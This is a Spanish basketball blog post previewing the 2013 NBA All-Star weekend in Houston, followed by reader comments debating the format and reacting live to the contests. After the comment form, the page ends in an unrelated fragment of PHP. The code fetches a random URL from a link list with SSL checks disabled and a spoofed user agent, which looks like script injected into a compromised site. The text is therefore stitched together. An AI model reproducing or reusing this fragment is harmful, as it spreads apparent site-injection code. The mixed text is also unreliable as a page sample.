Fin de semana del All Star: Me aburrooooooooo… (pero lo veo)

15 de February de 2013 por MagicJohnson32

all star houston 2013Por algún oscuro motivo, todavía queda gente a la que le gusta el All Star de la NBA. Tras haber visto, hace menos de 24 horas, las exhibiciones de LeBron y Durant en la victoria de los Heat sobre los Thunder ¿qué sentido tiene ahora ver el Este vs Oeste? Si lo único que uno quiere ver son mates, sólo tiene que ponerse un partido de los Clippers, y si se quieren triples, uno de los Warriors. Pero no, hay que detener la regular season durante cuatro días, que se nos hacen largos como una película de Isabel Coixet, para ver lo mismo que en los partidos pero sin apenas rivalidad ni valor competitivo. ¿Os he cortado ya el rollo lo suficiente? Entonces puede que hasta os sorprenda que vayamos a estar siguiendo el All-Star Weekend en esta entrada del blog y en twitter (con el hastag #tjallstar), no sea cuestión que pase algo interesante y nos lo perdamos.

Veamos en qué consistirá esta 62ª edición del All-Star, que acoge el Toyota Center de Houston entre el viernes y el domingo.

VIERNES

El viernes es, como de costumbre, el día reservado para los jóvenes. El Rising Stars Challenge vuelve a contar este año con el formato de Team Chuck vs Team Shaq. Es decir, se enfrentan equipos integrados por jugadores de primer y segundo año elegidos por Barkley y O’Neal en un mini draft. El Team Shaq está compuesto por Lillard,  Irving, Nicholson (en sustitución de Drummond), Klay ThompsonHarrison BarnesChandler Parsons, Waiters, Kidd-Gilchrist, Tyler Zeller y Kemba Walker. El Team Chuck lo forman Anthony Davis, Faried, Kawhi Leonard, Beal, Ricky Rubio, Tristan Thompson, Vucevic, Brandon Knight, Isaiah Thomas y Shved. Como ya sabéis, el Rising Stars consiste en una especie de partido de patio de colegio, aunque con menos defensa y más mates. El partido se disputará a las 3h00 y estará precedido a la 1h00 por el Celebrity Game, donde destaca la presencia de Usain Bolt.

SÁBADO

Sábado, día de concursos. El primero, a partir de las 2h30, será de nuevo el Shooting Stars, que este año cambia levemente el formato. Competirán dos equipos de la Conferencia Oeste, liderados por James Harden (si es que se recupera de la lesión de tobillo) y Russell Westbrook, contra dos de la Este, encabezados por Chris Bosh y Brook Lopez. A Harden le acompañarán Sam Cassell y la máxima anotadora en la historia de la WNBA, Tina Thompson. Westbrook participará junto a Robert Horry y Maya Moore, de las Lynx. Bosh estará secundado por Muggsy Bogues y Swin Cash, mientras que Nique Wilkins y la última MVP de las Finales, Tamika Catchings, jugarán con Lopez. El funcionamiento, ya se sabe: cada equipo ha de anotar desde cada una de las seis posiciones de tiro establecidas en el menor tiempo posible.

A continuación se disputará la undécima edición del concurso de habilidades, en el que Tony Paker defenderá título. Para ello habrá de superar a Jrue Holiday, Brandon Knight, Jeff Teague, Damian Lillard y Jeremy Lin. Será la antesala de los dos concursos tradicionales: triples y mates.

gif white

Con Kevin Love lesionado, el título del concurso de triples cambiará de manos este año con toda seguridad. Puede que haya ausencias destacadas entre los participantes (Korver, Klay Thompson, Foye…), pero la nómina de candidatos es más que digna: Ryan Anderson, Steph Curry, Paul George, Kyrie Irving, Steve Novak y, tal vez el más discutible por lo poco que juega, Matt Bonner.

Por último, la hora de los saltarines. Pasadas las 4h00, si todavía os quedan ganas, Jeremy Evans intentará revalidar como campeón del concurso de mates ante Eric Bledsoe, Kenneth Faried, Gerald Green, Terrence Ross y James White. Hay material para presenciar un gran concurso, con muchas miradas puestas en el duelo Green vs White.

DOMINGO

durant y lebron

Y la cosa acabará como siempre, con el All-Star Game, que se disputará la madrugada del domingo al lunes a partir de las 2h00. LeBron vs Durant, Wade vs Kobe, Griffin vs Garnett… sobre el papel, el partido tiene todos los alicientes para ser un espectáculo de primera pese a la ausencia de Rondo (y de D-Rose). El Este se presenta con James al frente de un equipo con seis debutantes (Chandler, George, Holiday, Irving, Lopez y Noah), además de sus compañeros Wade y Bosh, Luol Deng y Garnett. Debido a la lesión de Rondo, que iba a formar de inicio, Spoelstra ha decidido que será Bosh quien complete el quinteto junto a Wade, LeBron, Melo y Garnett.

En el Oeste sólo debutará James Harden, que llega con algunos problemas físicos pero parece que jugará. El quinteto lo forman Chris Paul, Kobe Bryant, Durant, Blake Griffin y Dwight Howard, con LaMarcus Aldridge, Duncan, David Lee, Tony Parker, Zach Randolph, Westbrook y el susodicho Harden como recambios. Lo dicho: mucho talento sobre una pista de baloncesto.

Comenta

43 comentarios a esta entrada

  1. Lucho dice:
    #1

    NBA para la gilada. El partido que mas les gusta a los qe solo conocen a Kobe y Lebron. Y el peor partido para los qe miramos nba regularmente

      Citar

  2. Simon dice:
    #2

    Lucho:
    NBA para la gilada. El partido que mas les gusta a los qe solo conocen a Kobe y Lebron. Y el peor partido para los qe miramos nba regularmente

    +1

      Citar

  3. Txusma dice:
    #3

    Pero nadie trasnochó para ver a jovenes? Como sois…
    Hoy me quedaré a ver los concursos por si pasa algo interesante

      Citar

  4. Denise dice:
    #4

    El All-Star es una castaña infumable y solo veré en diferido los triples y si acaso los mates. En el primero creo que ganará Novak, y en el otro Gerald Green.

    A ver si el nuevo comisionado que venga suprime esta mierda o se celebra antes de empezar la temporada y en febrero vemos un torneo digno con el formato de la Copa.

      Citar

  5. Jose Luis dice:
    #5

    Sería chulo eso de la Copa pero no creo que los americanos metan algo así. Antes veo un Extranjeros vs USA o algo por el estilo.

      Citar

  6. Ruxixón dice:
    #6

    Tenía toda la intención del mundo de ver hoy el partido pero al despertarme vi un tweet de un amigo echando pestes sobre el Rising Stars Challenge así que me quedaré con el resumen de los highlights en la página NBA y tan contento.

      Citar

  7. Jose Luis dice:
    #7

    Es que ha sido como siempre… un cachondeo. No sé como pero deberían incrementar la competitividad. Parece que les de igual ganar o perder. El de rookies vs sophomores tenía más intensidad que estos de ahora, y aún así era una pachanga. Pero la verdad es que no se me ocurre qué hacer. Quizá torneos eliminatorios… 5 vs 5 a 20 minutos, 7 jugadores por equipo. 28 jugadores, serían semifinales y final, y si pierdes estás eliminado. Creo que habría algo más de competitividad.

      Citar

  8. Ruxixón dice:
    #8

    Pues me parece buena idea Jose Luis,asemejarlo a las pachangas callejeras.

    Otra opción: 8 equipos de 3 jugadores (G-F-C) en formato de 3×3,mezclando sophomores y rookies.El primero que llegue a 11 puntos gana.Partidos muy cortos y que fomentan los piques.

      Citar

  9. Simon dice:
    #9

    Lo que molaría sería una especie de torneo el sabado de 1 contra 1 con los12 jugadores del all-star + 4 rookies/sophomores … y emparejamientos a sorteo puro… y asi ir haciendo eliminatorias y hasta que solo quedase uno… seguro que los Lebron/Kobe/Durant y demás se picaban para demostrar quien es mejor en 1×1 y el derrotado seguro saldría al dia siguiente con mas intensidad para resarcirse de la derrota…
    En el formato actual es un bodrio infumable.

      Citar

  10. Simon dice:
    #10

    Bueno tecnicamente he tenido un error en el mensaje anterior:
    serían 12 + 12=24 asi que en realidad se podría arreglar con 8 jugadores por cada conferencia de los del all-star ( con obligatoriedad de participar por parte de los titulares ) + 1 escogido por el entrenador + 1 escogido por la afición ( de entre los del all-star ) + 1 escogido por la afición con la posibilidad de escoger entre los del all-star y el resto de la liga. asi serían 16 jugadores, 4 rondas de eliminatorias y veriamos enfrentarse a los jugadores en 1vs1 y con el ego de algunos seguro que veríamos mas competitividad al menos aunque los 1vs1 no me entusiasman.

      Citar

  11. Sancho88 dice:
    #11

    Muy de acuerdo con cambiar el formato, lo actual ya está muy visto y no emociona a nadie, ni siquiera a ellos mismos. Como bien planteó Denise arriba, hacer un formato tipo copa estaría muy bien, y eso deberían exportarlo del modelo Fiba que tenemos en España. Aquí la copa son cuatro días de baloncesto espectáculo y tiene más seguimiento que la propia liga, así que por una vez ese formato se podría exportar. Que hagan 8 equipos con los 100 mejores jugadores por eficiencia de la liga (o 75 por eficiencia + 25 entre rookies y sophomores) y se jueguen un torneillo, estaría de lujo. Total, luego se tiran desde junio hasta noviembre sin partidos, asi que por retrasar un poco el final de la NBA podrían tirarse una semana o cuatro o cinco días jugando ese torneo. Sería muy interesante la verdad y se lo tomarían más en serio y al menos los aficionados veríamos algo nuevo y no siempre los mismos concursos descafeinados que ya no emocionan a nadie. En mates y triples ya no hay nada que contar, en los all stars tampoco, y los concursos chorras que sacan cada vez son más ridículos. De hecho, la imagen más impactante de todo el fin de semana será con seguridad la de Usain Bolt dando diez pasos y machacando a dos manos, y todo lo demás se olvidará, incluso eso… en fin, que se lo hagan mirar. FORMATO COPA YA!!

      Citar

  12. Asdare dice:
    #12

    Suelo estar de acuerdo con vosotros pero creo que con el allstar lo mirais desde la optica equivocada. El allstar actua durante 3 dias como escaparate de la liga. Hoy, por ejemplo, el que el partido sea competitivo o no da igual, lo importante es reunir a los mejores de primer y segundo año para darlos a conocer. Evidentemente, si sigues normalmente la NBA no te dice nada, pero creo que como producto publicitario para los que no la siguen (sobre todo chavales) sigue funcionando correctamente.
    Sin ser competitivo, cualquier otro formato acabaria tarde o temprano siendo lo que es ahora por que los m ismos jugadores no lo interpretan asi. Y si te vas a un formato copa deja de ser publicidad, por asi decirlo, ya que llevas a los mismos que luego van a jugar playoff.
    No se, yo lo dejaria asi porque en su momento me enganche a la NBA por estos allstar. Por 3 dias sin ver baloncesto de verdad tampoco nos va a pasar nada, menos aun despues del espectaculo del jueves.

      Citar

  13. Jones dice:
    #13

    Al final Chris Bosh termina de titular en el Este… Wade, LeBron y Bosh titulares, Spoelstra entrenador… ¿estáis seguros de que se enfrentan el Oeste contra el Este, y no el Oeste contra los Heat? Vale que en la votación se puedan incluir dos jugadores del mismo conjunto en el mismo equipo (no lo comparto, pero puede ocurrir), pero que un entrenador haga eso, metiendo a todos los jugadores posibles de su equipo, me parece feo para el espectáculo…

      Citar

  14. Jones dice:
    #14

    Por cierto, dejad de quejaros tanto sobre el all-star y tonterías… esto tiene 62 años ya, no va a cambiar ahora. A los americanos hay que quererlos, con sus virtudes y sus defectos, aunque nos duela…meter otro torneo serio en plan Copa sería quitarle valor al anillo, y eso jamás lo van a permitir

      Citar

  15. Jose Luis dice:
    #15

    No decimos en plan serio que compitan franquicias, pero sí en plan serio haciendo equipos con los all-star y rookies/sophomores y otros jugadores de nivel que no sean all-star. Por ejemplo, 4 equipos de 7 jugadores (28 jugadores) y a jugar semifinal y final, no sé, estaría bien.

      Citar

  16. Chipi dice:
    #16

    A mi modo de ver una de las mejores cosas de la NBA es que hay varios partidos diarios, cosa que no ocurre en ninguna otra liga deportiva del mundo, y como dicen que el roce hace el cariño, poco a poco voy encariñándome con estos chavales que tan bien nos lo hacen pasar a lo largo del año. Por eso veo bien que se cojan un fin de semana de relax, que disfruten, que hagan el chorra y en dos días vuelven al tajo y ya está. Lo veo como dejar a la parienta y los churumbeles en casa y marcharte unos días de casa rural con los colegas.

    Por supuesto, no voy a trasnochar para ver el Rookie Challenge ese ni el partido de mañana, pero los concursos son sagrados. Cada vez van a peor, sí, pero ya es tradición juntarme con unos cuantos a disfrutar y pasarlo bien. Yo lo veo así, un fin de semana para que disfruten los jugardores y quien quiera apuntarse.

      Citar

  17. franitis dice:
    #17

    Qué queréis que os diga… Si nos remontamos a los años 95 a 97 (Bulls de Jordan) yo me encontraba en el instituto y jugaba baloncesto con ficha de federación y como no había aún posibilidad de ver partidos como ahora si no tenías abono al plus, era la única posibilidad de ver NBA en abierto… Me ponía el despertador por la madrugada del sábado y el VHS a grabar la madrugada del domingo al lunes para ver a Jordan, Shaq, Kemp, Payton, Malone… Y no me perdía un solo All-Star Game…

    Hay momentos míticos (Bird sin quitarse la sudadera en la final de triples, Jordan VS Wilkins, Spud Webb…) y para los jugadores se considera un logro llegar a ser elegido en un All Star, llegando a puntuar positivamente en su curriculum y salario.

    Sentémonos a disfrutar, que al fin y al cabo siguen siendo esos que nos hacen vibrar semana a semana, día a día, disfrutando de un baloncesto espectáculo y con ciertos piques (Kobe, James, Durant… no se toman el partido a broma que digamos…) ¿Os acordáis del hachazo de Wade a Kobe en el último All Star?

      Citar

  18. Denise dice:
    #18

    Asdare:

    Sin ser competitivo, cualquier otro formato acabaria tarde o temprano siendo lo que es ahora por que los m ismos jugadores no lo interpretan asi. Y si te vas a un formato copa deja de ser publicidad, por asi decirlo, ya que llevas a los mismos que luego van a jugar playoff.

    Vale que la Copa la acabarían jugando casi los mismos equipos de Playoffs, pero al ser a un partido, todos tienen muchas posibilidades de ganarla. Es decir, los Hawks ó los Warriors van a clasificarse para Playoffs pero nadie va a apostar un duro a que ganarán el anillo, en cambio en un formato Copa, a un partido puede pasar cualquier cosa y tendrían tantas posibilidades como un Heat o un Thunder.
    Creo que tanto los jugadores como los aficionados de aquellos equipos de la clase media del momento verían con buenos ojos una Copa, y la oportunidad de ganar un titulo. Los primeros años quizas costaría que el torneo calase y se asentara, pero a partir de los 5 años, cuando todo el mundo tuviera asumido el torneo, sería una fantastica segunda competición que le daría vida a la temporada, y mucha mas importancia a la primera parte de la Regular Season.

      Citar

  19. Txusma dice:
    #19

    Yo el partido y los concursos no los cambiaría pero experimentaría con el partido de los jóvenes. de hecho, la NBa ya lo ha cambiado no? Antes era 1ª año contra 2o y ahora están todos bien mezclados con Shaq y Barkley de entrenadores.
    Creo q los jóvenes podrían jugar un torneo de 8 equipos con equipos de 3 vs 3. Al mejor de 11 puntos y en 3 horas lo tenemos resuelto. Creo que habría algo más de competitividad, los jóvenes se darían a conocer igualmente y se daría paso a un formato de baloncesto que está muy en boga.
    La elección de equipos la podrían hacer los mismos jugadores. La NBA escoge 8 y luego estos 8 van escogiendo a sus compañeros como cuando hacíamos los equipos en el patio.

    Por cierto, yo ya estoy esperando los concursos. Alguien va a estar por aquí?

      Citar

  20. MagicJohnson32 dice:
    #20

    Yo digo que gana Curry los triples y Gerald Green los mates.

      Citar

  21. txusma dice:
    #21

    MagicJohnson32:
    Yo digo que gana Curry los triples y Gerald Green los mates.

    No me digas que te vas a quedar a verlo?

      Citar

  22. MagicJohnson32 dice:
    #22

    txusma: No me digas que te vas a quedar a verlo?

    Uy no, en cuanto acabe la peli, a dormir 😉

      Citar

  23. Melo15 dice:
    #23

    Yo me quedo! Me apetece bastante!

      Citar

  24. txusma dice:
    #24

    Bueno, al menos no estoy solo! 😀

      Citar

  25. txusma dice:
    #25

    Bueno, ya tenemos ganador del primer concurso. Chris Bosh, Dominique Wilkins y Swin Cash… Apasionante. No sé como podéis dormir.

      Citar

  26. txusma dice:
    #26

    Bueno, Damian Lillard se lleva el concurso de habilidades tras superar a Holiday en la final.
    No me hace falta café de lo emocionado que estoy.

    Por favor, q los concursos de triples y mates estén bien.

      Citar

  27. rumbero dice:
    #27

    Yo me he echado una cabezadita mientras Teague acababa el concurso de habilidades pero ya está…. Ahora a animar a Bonner

      Citar

  28. Txusma dice:
    #28

    Enorme concurso de triples!! Gana Irving con 23, una señora puntuación, y Bonner ha sido un gran rival. Vamos a ver los mates!

      Citar

  29. Txusma dice:
    #29

    Bua! El primer mate ya es mejor q todo el concurso del año pasado. Enorme Gerald Green!!!

      Citar

  30. rumbero dice:
    #30

    Que bajonazo de segunda ronda…

      Citar

  31. Txusma dice:
    #31

    Pues sí… Con lo bien que íbamos. A ver Ross

      Citar

  32. Txusma dice:
    #32

    Bueno, han pasado Evans y Ross y la final y la verdad es que lo han hecho muy bien. El primer mate de Ross y el segundo de Evans, tremendísimos. Muy estéticos…

    Y al final gana… Terrence Ross!

      Citar

  33. Txusma dice:
    #33

    Fin de la fiesta. Muy buen concurso de triples y buen concurso de mates con varios mates destacados. No dejéis de buscar los primeros de Gerald Green, James White y Terrence Ross y los segundos de Faried y Bledsoe de la primera ronda. Y después en la final muy buenos el primero de Ross (buenísimo) y el segundo de Evans, muy estético. Si Jeremy Evans fuera más famoso (si lo hace Kobe, por ejemplo) estoy seguro de que pasaría a la historia en forma de póster.

    Ale, a dormir!

      Citar

  34. rumbero dice:
    #34

    Pues si, buen concurso en general. Lástima que Green y White de los que se esperaba mucho acabaran pinchando en la segunda ronda. A este último seguramente lo tendrian que haber invitado hace 5 años…
    Los de Faried y Bledose a lo J. Richardson estuvieron realmente bien y Ross hizo un concurso de lo mas completo
    El de triples tuvo mucho nivel. Por un momento vi a Irving pasando de los 25…que crack

      Citar

  35. MagicJohnson32 dice:
    #35

    El de Gerald Green, increíble: http://www.youtube.com/watch?v=eBbfvWiC_XM

      Citar

  36. Jose Luis dice:
    #36

    Pues tampoco lo veo para tanto… el de Jeremy Evans con la foto me parece increíble, saltar ese 1,85 por lo menos y así ancho, que no es como una persona que la pasas entre las piernas… puf!

      Citar

  37. Txusma dice:
    #37

    Jose Luis:
    Pues tampoco lo veo para tanto… el de Jeremy Evans con la foto me parece increíble, saltar ese 1,85 por lo menos y así ancho, que no es como una persona que la pasas entre las piernas… puf!

    Pero tu ves donde llega la cabeza de Green? Es muy bestia. Si este mate no te parece para tanto entiendo q siempre decepcionen los concursos

      Citar

  38. Jose Luis dice:
    #38

    No se, ya digo, me impresionó más el de Jeremy Evans, o el de Terrence Ross saltando por encima del chico

      Citar

  39. Txusma dice:
    #39

    Jose Luis:
    No se, ya digo, me impresionó más el de Jeremy Evans, o el de Terrence Ross saltando por encima del chico

    Los 2 de Evans en la final fueron muy buenos y de Ross el primero me pareció brutal. Al final la sensación es agridulce pq al concurso le faltò ritmo. Demasiados fallos al inicio de la 2a ronda pero claro, exigimos muchony los mates ya no pueden ser muy clásicos. Complicado de resolver

      Citar

  40. nba dice:
    #40

    rumbero:

    El de triples tuvo mucho nivel. Por un momento vi a Irving pasando de los 25…que crack

    A este tio no se cual va a ser su limite, si las lesiones le respetan…, no se hasta cuando lo conseguiran retener en Cleveland

      Citar

  41. MagicJohnson32 dice:
    #41

    ¿Alguien viendo el partido? Durant puede meter 60 si quiere.

      Citar

  42. Ruxixón dice:
    #42

    A mí el de White casi desde el tiro libre a dos manos me parece una pasada a cámara lenta

    https://www.youtube.com/watch?feature=player_embedded&v=QciuyRAxYfU

    No recordaba que White era el jugador que hizo ese mate bestial en la D-League en 2009 y si por el mítico duelo en Rusia contra Green.En fin,la noche de los concursos fue in crescendo,insulso Shooting Stars,lamentable Skills Challenge,grandísimo concurso de triples(lo mejor del fin de semana) y buen concurso de mates,deslucido por la cantidad de fallos que se vieron,pero los que salieron de buen nivel.Me alegro por Ross y espero que su carrera no se quede en los mates ya que es más jugador de lo que la rotación en Toronto puede indicar.

      Citar

  43. lg1000 dice:
    #43

    yo haria una Copa con los 4 primeros del Este y del Oeste con cruces 1 vs 4 y 2 vs 3 hasta la final habria competitividad y encima habria otro titulo por el que luchar no solo ganarian los favoritos, aunque no creo que lo hagan asi.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>